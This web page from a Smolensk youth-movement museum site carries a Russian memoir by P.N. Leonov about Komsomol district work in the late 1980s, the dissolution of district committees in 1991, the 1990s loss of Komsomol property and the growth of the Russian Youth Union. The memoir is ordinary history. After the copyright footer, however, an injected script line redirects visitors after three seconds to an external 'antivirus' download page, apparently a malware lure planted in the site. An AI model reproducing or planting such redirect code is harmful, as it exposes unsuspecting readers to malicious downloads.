Так это было
 
 

 

Сборник "Так это было. Смоленский комсомол 1960-80 годов в воспоминаниях современников"


Литература
Так это было

"Так это было.
Смоленский
комсомол 1960-80
годов в воспоминаниях
современников"
Дети и молодёжь Смоленщины 1920-1930-е годы
Дети и молодёжь
Смоленщины
1920-1930-е годы

Спонсоры музея истории молодежного движения

 

Выражаем огромную благодарность людям, которые приняли и принимают участие в жизни музея и комплектации его фондов.


       
      
 

 

Павел Николаевич Леонов,
первый секретарь Смоленского обкома РСМ
с 1995 по 1997 год,
председатель Смоленской областной
организации РСМ с 1997 по 2005 год.

П.Н. Леонов

 
 

ВЛКСМ – ЛКСМ – РСМ

Если считать, что комсомольским работником становятся в тот момент, когда начинают получать за это заработную плату, то для меня это случилось 29 декабря 1986 года, когда в качестве инструктора организационного отдела я переступил порог Ленинского райкома ВЛКСМ.
Впереди были новогодние праздники, настроение было приподнятым. Но меня ждал сюрприз. В то время существовал порядок, что в выходные и праздничные дни в здании в ночное время дежурили ответственные работники райкомов партии и комсомола. Естественно, в новогоднюю ночь эта «почетная» обязанность возлагалась на боевой резерв – работников райкома комсомола. Первый секретарь райкома Игорь Ермаков в качестве жеста, означавшего развитие демократических начал в обществе, предложил мужчинам тянуть спички. Я тянул первым и вытянул короткую; как оказалось впоследствии, из 3 коротких. Так в новогоднюю ночь с 1986 на 1987 год состоялось мое «боевое крещение».
Вторая половина 80-х годов – это время развития перестройки, время, когда причудливым образом сочетались старые формы работы и желание найти что-то новое, живое.
Мои трудовые будни начались в январе, а это было временем составления годового статистического отчета, списка кадрового резерва и других важных бумажных дел, коими и должен был заниматься орготдел. С ужасом вспоминаю огромную бумажную простыню, расстеленную в коридоре райкома, на которую поздними вечерами разносились многочисленные статистические данные о 130 первичных организациях района.
Непонимание вызывало то, что эта работа выполнялась именно во внеурочное время. Уже позднее я понял, в чем крылась причина. Орготдел в то время возглавляла Марина Вдовыченко, сектор учета – Люда Фомченкова. Девушки они были незамужние, торопиться им было некуда... Вообще, на мой взгляд, тема «Женщина в комсомоле» заслуживает отдельного разговора и в чем-то даже перекликается с темой «Женщина на войне».
Работа по составлению кадрового резерва тоже, по-моему, казалась достаточно абсурдной. Мы должны были подобрать по две замены (так называемый «ближний» и дальний) не только на секретарей комитетов комсомола крупных предприятий и учебных заведений, но и на секретарей всех первичных и даже цеховых организаций. Хотя иногда численность этих организаций равнялась 3-5 комсомольцам. С точки зрения сегодняшнего дня, когда оцениваешь кадровую политику в городе, области, да и в России, понимаешь, что в то время была определенная система работы с кадрами (пусть иногда и формально-бюрократическая).
Первичные организации района были весьма разнообразны. В Ленинском районе были сосредоточены практически все вузовские организации города: Смоленского филиала Московского энергетиче­ского института (секретари Александр Лазнов, Игорь Морозов), Смоленского государственного педагогического института (Евгений Кодин, Александр Мамонтов), Смоленского государственного института физической культуры (Георгий Грец), сельскохозяйственного института (Алексей Большаков) и государственной медицинской академии (Александр Пунин, Анатолий Овсянкин).
Это были крупнейшие организации с правами райкомов численностью 2-3 тысячи человек. Жизнь в них, что называется, кипела – постоянно проводились многочисленные мероприятия, возникали новые идеи, и задача райкома заключалась в основном в том, чтобы все это происходило в рамках здравого смысла и Устава.
Были и другие организации, такие как трест столовых, трест ресторанов и кафе, облшвейбыт и другие. Они относились к Ленинскому району, но фактически находились на территории всего города, от Киселевки до Гнездова. Работали в них в основном представительницы прекрасной половины, условия работы были довольно своеобразные. Поэтому подвигнуть эти «первички» на большие дела было практически невозможно, а сложности возникали даже в организационных моментах – при проведении собраний, учете членов организации и других. Иногда доходило до того, что задолженность по уплате член­ских взносов гасилась прямо из кассы столовой или кафе.
Была многочисленная группа мелких организаций численностью от 5 до 20 человек. Естественно, о большой работе в таких организациях говорить не приходилось, хотя в значительной степени многое зависело от отношения руководства организации к молодежи.
Еще один пример столкновения нового и старого. Уже позднее, в октябре 1990 года, мы готовили очередную отчетно-выборную конференцию районной организации. Вместе с работниками учебно-методического центра обкома ВЛКСМ Ириной Мирошниченко и Александром Огородниковым договорились провести обязательный в таких случаях пленум, предшествующий конференции, в форме деловой игры. Это сейчас такая форма работы стала неотъемлемой частью семинаров и конференций, а в то время это было ноу-хау. В принципе, по Уставу, мы должны были созвать пленум, зачитать 45-минутный отчетный доклад, провести прения, утвердить доклад и вынести его на обсуждение конференции.
Мы пошли другим путем. Распечатали основные тезисы доклада, создали группы по различным направлениям и провели «мозговой штурм». На мой взгляд, все прошло достаточно интересно и продуктивно, были внесены интересные предложения в постановление конференции и, главное, понравилось самим ребятам.
Тем не менее на следующее утро секретариат райкома – 2-й секретарь Александр Балыкин, 3-й секретарь Наталья Филина, зав. орготделом Галина Сусликова и я – были вызваны «на ковер» к секретарю райкома партии Галине Васильевне Почечуевой. Нам был учинен разнос с использованием жестких идеологических выражений: нельзя превращать серьезное мероприятие в балаган, всему должна быть мера, и вообще надо повторить и провести пленум по-серьезному. Несмотря на определенную дрожь в голосах и коленях, мы сумели доказать свою правоту. И таких эпизодов, когда приходилось доказывать, что у комсомола в принципе может быть своя точка зрения, было в тот период достаточно много.
Если говорить о наиболее запомнившихся событиях в жизни областной комсомольской организации, я бы выделил следующие (в порядке хронологии).
Первое – это принятие в 1987 году решения о создании Дома молодежи при обкоме ВЛКСМ. Второе – в 1988 году принятие постановления (по инициативе обкома комсомола) о сооружении памятника воинам-интернационалистам.
Почему именно эти?
Прежде всего дела такого масштаба явились бы гордостью и для столичных организаций (Москва, Ленинград и т.д.). А для организаций уровня смоленской это был, как принято сейчас говорить, экс­клюзив.
Но, что не менее важно, они (события) показали, что смоленский комсомол может заниматься не только идеологической работой, но готов и способен решать сложнейшие финансово-хозяйственные задачи, т.к. реализация этих проектов была связана со строительством, капитальным ремонтом, разработкой и сооружением схем энергоснабжения, коммуникации и т.д. и т.д.
Еще запомнилось участие в организации концерта в рамках празд­нования 1125-летия Смоленска (май 1988 года) на площади возле ЦУМа, в котором наряду с народными и эстрадными коллективами принимали участие рок-команды «Нянечка», «БМП», «Дилижанс» и др. Музыкантам, наверное, впервые в жизни пришлось изложить свои творения в письменном виде. Мы в райкоме их распечатали, и я отнес в литотдел на 1-й этаж Дома Советов, где дядечка предпенсионного возраста в течение 2 или 3 дней их внимательно изучал (видимо, пытаясь вникнуть в суть), но все-таки поставил штамп «Разрешено». До сих пор не знаю, проверял ли кто соответствие написанного исполняемому со сцены.
Если отвечать на вопрос, что мне дала работа в комсомоле, я для себя выделил бы две главные составляющие.
Во-первых, это умение самоорганизовываться. Рабочий график был достаточно плотный. Приходилось участвовать в заседаниях бесчисленных комиссий и оргкомитетов, встречаться со множеством интересных (и не очень) людей, «ходить» (как было принято говорить) в «первички» и успевать сделать много важных для Родины дел. Организация и проведение любого мероприятия также были связаны с решением множества организационных вопросов.
Во-вторых, это умение общаться и находить общий язык с весьма разными людьми: большими начальниками и простыми работягами, ветеранами войны и труда и рокерами, милиционерами и трудными подростками и т.д. С кем-то приходилось соглашаться, кого-то убеждать, но в большинстве случаев удавалось достичь конструктивного результата. Эти два качества помогают в жизни до сих пор.
Как уже отмечал, благодаря продуманной кадровой политике в партии и комсомоле редко встречались случайные и малоинтересные люди. Не хотелось бы никого выделять персонально, а просто поблагодарить всех, с кем пришлось работать в те годы.
Комсомол был одним из механизмов гигантской государственной машины, которая называлась Союз Советских Социалистических Республик. Таким же, как КПСС, армия, Советы народных депутатов и др. И ответ на вопрос о причине кризиса начала 90-х годов, на мой взгляд, лежит в той же плоскости, что и на вопрос, а была ли правильной конструкция этой машины, которая создавалась и модернизировалась начиная с 1917 года. Почему в течение четырех месяцев (после августа 1991 г.) распался Советский Союз? Почему в течение считанных недель распались Варшавский договор и СЭВ? Почему никто из 20 миллионов членов КПСС не вышел на защиту своей партии, когда ее запрещали и разгоняли? Вопросы бесконечные, а однозначных ответов нет.
Кроме того, на мой взгляд, в комсомоле имел место разрыв между «верхами» (аппарат + актив) и «низами» (рядовыми комсомольцами). Если для первых комсомол был источником ярких и запоминающихся событий, дел и мероприятий (а также заработной платы и материальных благ), то для вторых членство в комсомоле было простой обыденностью, необходимым условием для получения нужной характеристики, возможности поездки за границу и т.д.
Я думаю, что тяжело было 20-летнему человеку понять, глядя на экран телевизора, почему с отчетным докладом на очередном съезде комсомола выступает товарищ, которому далеко за 28...
Тем не менее, в силу своей мобильности, подвижности, комсомол сумел избежать в начале 90-х полного развала. Не прав (трижды!) тот, кто думает, что ВЛКСМ прекратил свое существование в 1991 году. Прекратил существование Всесоюзный Ленинский и Коммунистиче­ский, но остался Союз молодежи Российской Федерации, или, официально, общероссийская общественная организация Российский Союз Молодежи (РСМ). РСМ в юридическом плане является правопреемником комсомола, что многократно доказано, в т.ч. и в судебных инстанциях.
Вот почему в свидетельствах о регистрации в органах юстиции многих региональных организаций РСМ (Свердловской, Костромской и др.) в графе «дата создания» указан 1919 год.
Поэтому можно сказать, что с комсомольской работы я до сих пор так и не ушел. В 91 году, после того как в г. Смоленске были ликвидированы районные комитеты комсомола, меня пригласили на работу в Смоленский Дом молодежи при обкоме ВЛКСМ, затем в январе 92 года я был избран членом бюро обкома РСМ, а в феврале 1995 г. – руководителем областной организации (сперва – секретарем, а затем – председателем).
Если вернуться к 1991 году, то до сих пор решение о ликвидации райкомов комсомола, а не горкома, представляется спорным, а если честно, то неверным. Однозначно, в таком городе как Смоленск (численностью населения около 300 тысяч человек), одновременная работа 3 райкомов (штатной численностью 15 человек) и горкома (с таким же штатом) была нецелесообразна. Как с точки зрения затрат на содержание аппарата, так и с точки зрения практически полного дублирования функций. А был еще и обком, который контролировал работу не только горкома, но и не забывал про нас.
Естественно, было два противоположных мнения: первое – ликвидировать райкомы, оставить горком; второе – прямо противоположное. До настоящего времени считаю, что логичнее было бы оставить районные комитеты. В первую очередь потому, что они были «ближе к земле». «Первички» выходили непосредственно на районы, наши работники намного чаще бывали в организациях, встречались с комсомольцами, знали проблемы «из первых рук». По-моему, городской комитет в основном контролировал ситуацию и раздавал «ЦУ» (ценные указания). Такого же мнения придерживались многие секретари, члены райкомов.
Однако в подобной ситуации на уровне партийных органов уже было принято решение: оставлять горком партии, видимо, с целью отрапортовать о значительном сокращении партработников и расходов на содержание аппарата (в соответствии с политической линией того времени). Поэтому в апреле 91-го на объединенном пленуме город­ского и районных комитетов города было «продавлено» аналогичное решение. Не решался комсомол противоречить партии. Это также одна из причин кризиса 90-х.
Становление и развитие Российского Союза Молодежи шло противоречиво и трудно. Развалился нерушимый СССР, Ельцин стал строить демократию, Гайдар – лечить экономику шоковой терапией, Чубайс – приватизировать, цены – расти, а жизнь – «улучшаться». Прекратилось централизованное финансирование областных организаций РСМ, многие работники стали уходить в возникающие коммерческие структуры. Для многих из них стартовым капиталом стала комсомольская собственность. (В качестве ремарки хотелось бы отметить, что в 91 году было принято решение о национализации только собственности КПСС, что касается собственности молодежных организаций, то она национализации не подлежала. Это разъяснялось в специальном письме руководителя администрации Президента Российской Федерации).
О том, насколько разрушительными для областной молодежной организации были 90-е годы, говорят следующие факты. В 1990 году на балансе Смоленского обкома ВЛКСМ находились 3-этажное здание в самом центре города на ул. Ленина (в капитальный ремонт здания было вложено около 200 тысяч рублей комсомольских средств в ценах того времени), целый автопарк (36 автомобилей, в т.ч. 2 «Волги» ГАЗ-24, 9 «Нив» ВАЗ-2121, 5 «Москвичей», 16 УАЗ-469, бортовой УАЗ, автобусы ПАЗ и РАФ), более 30 телефонных номеров, автомобили были практически в каждом из 30 районов области.
В феврале 1995 года на балансе Смоленского обкома РСМ (правопреемника обкома ВЛКСМ) числилось несколько столов, стульев, поломанный персональный компьютер «Электроника», два телефонных номера да старый грузовой УАЗ, требующий капитального ремонта. Организация вынуждена была переехать в здание Дома молодежи.
Информация к размышлению: в Центральном районе только в Ярославле и Костроме организации РСМ владеют бывшими зданиями обкомов комсомола. Но в целом по России почти всю комсомоль­скую собственность удалось сохранить лишь в 25 территориях.
Нельзя сказать, что руководство Смоленской организации РСМ ничего не делало, чтобы приостановить этот процесс. Подавались судебные иски против неправовых действий отдельных комсомольских работников, предпринимались попытки возврата заемных средств, выделенных хозрасчетным предприятиям, делались попытки привлечения денежных средств в организацию. Отмечу работу в этом направлении Сергея Григоренко, который возглавлял организацию до декабря 1991 года. Не случайно он был приглашен на работу в Центральный комитет РСМ, сначала на должность заведующего орготделом, а затем избран секретарем ЦК.
Но разрушительный процесс остановить было трудно. Сейчас, спустя более 10 лет, тяжело читать протоколы районных конференций с решением о ликвидации организаций с формулировками «в связи с отсутствием финансирования» или «с нежеланием членов организации участвовать в ее деятельности».
Надо отметить, что РСМ был одним из инициаторов создания государственных органов по работе с молодежью. При поддержке РСМ была проведена Всероссийская акция «Хочу быть услышанным», в ходе которой проводился сбор подписей в поддержку соответствующего обращения к Президенту России. Такое решение было принято, и не случайно во многих регионах России, в т.ч. и на Смоленщине. Первыми руководителями государственных структур по делам молодежи стали руководители областных организаций РСМ. Хотя не всегда такое совмещение было на пользу дела, т.к. появлялся соблазн решать государственные дела за счет ресурсов общественной организации. Реально совмест­ные мероприятия стали проводиться, когда городской комитет по делам молодежи возглавил Владимир Горьков, а областной – Сергей Кривко. Они поняли, что РСМ – это реальная организация, обладающая значительным творческим и организационным потенциалом, и только соединение государственных и общественных организаций может дать эффект в работе с молодежью.
Премьера такого сотрудничества состоялась в июне 1997 года, когда впервые на площади им. Ленина прошло празднование Дня молодежи. На площади собрались тысячи молодых смолян, на сцене выступали популярные смоленские коллективы, состоялся праздничный фейерверк. Такое событие состоялось в Смоленске впервые за многие годы. Его организация и проведение потребовали преодоления многих бюрократических препон, согласования работы многих организаций и структур. Всего этого удалось достичь во многом благодаря энергии и пробивной способности Владимира Горькова. Впоследствии проведение подобных мероприятий стало хорошей традицией в жизни города и области.
Много противоречивого было в программных целях РСМ. Сперва декларировался полный отказ от всего, что было накоплено за долгие годы развития комсомола, включая положительное, давалась полная свобода деятельности территориальным организациям, свобода отказа от выполнения принятых решений и т.д. и т.п. Но поскольку большинство сил в организации было здравым и здоровым, со временем многое встало на свои места.
Сейчас Российский Союз Молодежи – наиболее массовая, динамично развивающаяся молодежная организация Российской Федерации. РСМ действует в 72 регионах страны и насчитывает около 225 тысяч индивидуальных членов. Организация стремится использовать в своей работе все лучшее, что было в комсомоле, но в то же время подчеркивает свою непартийность и неидеологизированность. РСМ нашел свое место в рамках реализации государственной молодежной политики, разработано и осуществляется множество социально значимых программ, которые получают поддержку, в т.ч. и финансовую, как государственных структур, так и бизнес-партнеров. Основные программы – это «Российские интеллектуальные ресурсы», «Молодежная карта «ЕВРО<26», «Добровольческий корпус здоровья», «ХИП-ХОП старт», фестивали КВН и многие другие.
Смоленская организация РСМ на сегодняшний день насчитывает свыше тысячи индивидуальных членов. Основными партнерами организации являются Смоленский Дом молодежи, областной департамент по образованию и молодежной политике, ГУ «Радуга», общественная организация «Маска», компания «Мобильные ТелеСистемы», радиостанция «Русское Радио-Смоленск», газеты «Смоленские новости» и «Комсомольская правда»–Смоленск» и многие другие. В среднем за год для молодежи города и области проводится свыше 30 крупных мероприятий: фестивали, конкурсы, концерты и многое другое. Представители нашей организации активно принимают участие в межрегиональных, всероссийских и международных акциях и мероприятиях. Хотелось бы отметить работу активистов – Антоненкова Алексея, Денисова Дмитрия, Марачевой Анны, Ноздрина Сергея, Гуськова Сергея, Помарановой Ольги, Щербакова Алексея и многих других.

2004 г.

 

    (c) Авторские права на сайт принадлежат ООО "Союз ДМ", Смоленской областной общественной организации Общероссийской общественной организации "Российский Союз Молодежи", 2008-2012г.  
setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>